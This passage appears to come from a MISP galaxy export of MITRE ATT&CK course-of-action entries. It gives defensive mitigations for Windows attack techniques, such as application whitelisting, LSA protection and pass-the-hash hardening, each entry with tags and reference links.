https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1007

https://technet.microsoft.com/en-us/library/ee791851.aspx

Taint Shared Content Mitigation - T1080

Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).

Reduce potential lateral movement risk by using web-based document management and collaboration services that do not use network file and directory sharing.

Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Taint Shared Content Mitigation - T1080"

Taint Shared Content Mitigation - T1080 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

Table 6503. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://attack.mitre.org/mitigations/T1080

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Security Support Provider Mitigation - T1101

Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code>, which requires all SSP DLLs to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)

The tag is: misp-galaxy:mitre-course-of-action="Security Support Provider Mitigation - T1101"

Security Support Provider Mitigation - T1101 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1101" with estimative-language:likelihood-probability="almost-certain"

Table 6504. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/mitigations/T1101

https://technet.microsoft.com/en-us/library/dn408187.aspx

Peripheral Device Discovery Mitigation - T1120

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Peripheral Device Discovery Mitigation - T1120"

Peripheral Device Discovery Mitigation - T1120 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Table 6505. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1120

https://technet.microsoft.com/en-us/library/ee791851.aspx

Password Policy Discovery Mitigation - T1201

Mitigating discovery of password policies is not advised since the information is required to be known by systems and users of a network. Ensure password policies are such that they mitigate brute force attacks yet will not give an adversary an information advantage because the policies are too light. Active Directory is a common way to set and enforce password policies throughout an enterprise network. (Citation: Microsoft Password Complexity)

The tag is: misp-galaxy:mitre-course-of-action="Password Policy Discovery Mitigation - T1201"

Password Policy Discovery Mitigation - T1201 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 6506. Table References

Links

https://attack.mitre.org/mitigations/T1201

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements

Install Root Certificate Mitigation - T1130

HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where an adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications, by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)

Windows Group Policy can be used to manage root certificates and the <code>Flags</code> value of <code>HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots</code> can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. (Citation: SpectorOps Code Signing Dec 2017)

The tag is: misp-galaxy:mitre-course-of-action="Install Root Certificate Mitigation - T1130"

Install Root Certificate Mitigation - T1130 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130" with estimative-language:likelihood-probability="almost-certain"

Table 6507. Table References

Links

https://attack.mitre.org/mitigations/T1130

https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

Modify Existing Service Mitigation - T1031

Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for Privilege Escalation weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Modify Existing Service Mitigation - T1031"

Modify Existing Service Mitigation - T1031 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031" with estimative-language:likelihood-probability="almost-certain"

Table 6508. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1031

https://github.com/mattifestation/PowerSploit

Remote File Copy Mitigation - T1105

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Remote File Copy Mitigation - T1105"

Remote File Copy Mitigation - T1105 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 6509. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1105

Graphical User Interface Mitigation - T1061

Prevent adversaries from gaining access to credentials through Credential Access that can be used to log into remote desktop sessions on systems.

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) and Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Graphical User Interface Mitigation - T1061"

Graphical User Interface Mitigation - T1061 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Graphical User Interface - T1061" with estimative-language:likelihood-probability="almost-certain"

Table 6510. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1061

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Deployment Software Mitigation - T1017

Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.

The tag is: misp-galaxy:mitre-course-of-action="Application Deployment Software Mitigation - T1017"

Application Deployment Software Mitigation - T1017 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"

Table 6511. Table References

Links

https://attack.mitre.org/mitigations/T1017

Credentials in Files Mitigation - T1081

Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences. (Citation: Microsoft MS14-025)

The tag is: misp-galaxy:mitre-course-of-action="Credentials in Files Mitigation - T1081"

Credentials in Files Mitigation - T1081 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"

Table 6512. Table References

Links

http://support.microsoft.com/kb/2962486

https://attack.mitre.org/mitigations/T1081

Remote System Discovery Mitigation - T1018

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Remote System Discovery Mitigation - T1018"

Remote System Discovery Mitigation - T1018 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 6513. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1018

https://technet.microsoft.com/en-us/library/ee791851.aspx

Indirect Command Execution Mitigation - T1202

Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)

The tag is: misp-galaxy:mitre-course-of-action="Indirect Command Execution Mitigation - T1202"

Indirect Command Execution Mitigation - T1202 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 6514. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1202

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

https://technet.microsoft.com/en-us/library/ee791851.aspx

XSL Script Processing Mitigation - T1220

[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and/or msxsl.exe may or may not be used within a given environment. Disabling WMI may cause system instability and should be evaluated to assess the impact to a network. If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="XSL Script Processing Mitigation - T1220"

Table 6515. Table References

Links

https://attack.mitre.org/mitigations/T1220

Standard Cryptographic Protocol Mitigation - T1032

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Standard Cryptographic Protocol Mitigation - T1032"

Standard Cryptographic Protocol Mitigation - T1032 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 6516. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1032

Custom Cryptographic Protocol Mitigation - T1024

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Custom Cryptographic Protocol Mitigation - T1024"

Custom Cryptographic Protocol Mitigation - T1024 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 6517. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1024

System Information Discovery Mitigation - T1082

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Information Discovery Mitigation - T1082"

System Information Discovery Mitigation - T1082 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 6518. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1082

https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Remote Management Mitigation - T1028

Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices. (Citation: NSA Spotting)

The tag is: misp-galaxy:mitre-course-of-action="Windows Remote Management Mitigation - T1028"

Windows Remote Management Mitigation - T1028 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028" with estimative-language:likelihood-probability="almost-certain"

Table 6519. Table References

Links

https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

https://attack.mitre.org/mitigations/T1028

Commonly Used Port Mitigation - T1043

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Commonly Used Port Mitigation - T1043"

Commonly Used Port Mitigation - T1043 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 6520. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1043

Security Software Discovery Mitigation - T1063

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about local security software, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Security Software Discovery Mitigation - T1063"

Security Software Discovery Mitigation - T1063 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 6521. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1063

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Network Service Scanning Mitigation - T1046

Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Service Scanning Mitigation - T1046"

Network Service Scanning Mitigation - T1046 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 6522. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1046

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Isolation and Sandboxing - M1048

Restrict execution of code to a virtual environment on or in transit to an endpoint system.

The tag is: misp-galaxy:mitre-course-of-action="Application Isolation and Sandboxing - M1048"

Table 6523. Table References

Links

https://attack.mitre.org/mitigations/M1048

Inhibit System Recovery Mitigation - T1490

Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery.

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Citation: Ready.gov IT DRP) Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

Identify potentially malicious software and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Inhibit System Recovery Mitigation - T1490"

Table 6524. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1490

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.ready.gov/business/implementation/IT

Uncommonly Used Port Mitigation - T1065

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Uncommonly Used Port Mitigation - T1065"

Uncommonly Used Port Mitigation - T1065 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

Table 6525. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1065

Pass the Hash Mitigation - T1075

Monitor systems and domain logs for unusual credential logon activity. Prevent access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.

Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located at `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy`. Through GPO: Computer Configuration > [Policies] > Administrative Templates > SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons. (Citation: GitHub IAD Secure Host Baseline UAC Filtering)

Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary’s ability to perform Lateral Movement between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.

The tag is: misp-galaxy:mitre-course-of-action="Pass the Hash Mitigation - T1075"

Pass the Hash Mitigation - T1075 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"

Table 6526. Table References

Links

https://attack.mitre.org/mitigations/T1075

https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml

Remote Desktop Protocol Mitigation - T1076

Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins. (Citation: Berkley Secure) Do not leave RDP accessible from the internet. Change GPOs to define shorter session timeouts and the maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server. (Citation: Windows RDP Sessions)

The tag is: misp-galaxy:mitre-course-of-action="Remote Desktop Protocol Mitigation - T1076"

Remote Desktop Protocol Mitigation - T1076 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"

Table 6527. Table References

Links

https://attack.mitre.org/mitigations/T1076

https://security.berkeley.edu/node/94

https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx

NTFS File Attributes Mitigation - T1096

It may be difficult or inadvisable to block access to EA and ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Symantec ADS May 2009) Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA and ADSs by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded. (Citation: InsiderThreat NTFS EA Oct 2017)

The tag is: misp-galaxy:mitre-course-of-action="NTFS File Attributes Mitigation - T1096"

NTFS File Attributes Mitigation - T1096 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096" with estimative-language:likelihood-probability="almost-certain"

Table 6528. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1096

https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

Permission Groups Discovery Mitigation - T1069

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Permission Groups Discovery Mitigation - T1069"

Permission Groups Discovery Mitigation - T1069 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

Table 6529. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1069

https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Admin Shares Mitigation - T1077

Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group on multiple systems.

Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Windows Admin Shares Mitigation - T1077"

Windows Admin Shares Mitigation - T1077 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 6530. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1077

https://technet.microsoft.com/en-us/library/ee791851.aspx

Pass the Ticket Mitigation - T1097

Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts. (Citation: ADSecurity AD Kerberos Attacks)

For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. (Citation: CERT-EU Golden Ticket Protection)

Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Pass the Ticket Mitigation - T1097"

Pass the Ticket Mitigation - T1097 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"

Table 6531. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://adsecurity.org/?p=556

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1097

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

https://technet.microsoft.com/en-us/library/ee791851.aspx

Disabling Security Tools Mitigation - T1089

Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.

The tag is: misp-galaxy:mitre-course-of-action="Disabling Security Tools Mitigation - T1089"

Disabling Security Tools Mitigation - T1089 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 6532. Table References

Links

https://attack.mitre.org/mitigations/T1089

Space after Filename Mitigation - T1151

Prevent files from having a trailing space after the extension.

The tag is: misp-galaxy:mitre-course-of-action="Space after Filename Mitigation - T1151"

Space after Filename Mitigation - T1151 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Space after Filename - T1151" with estimative-language:likelihood-probability="almost-certain"

Table 6533. Table References

Links

https://attack.mitre.org/mitigations/T1151

Credentials in Registry Mitigation - T1214

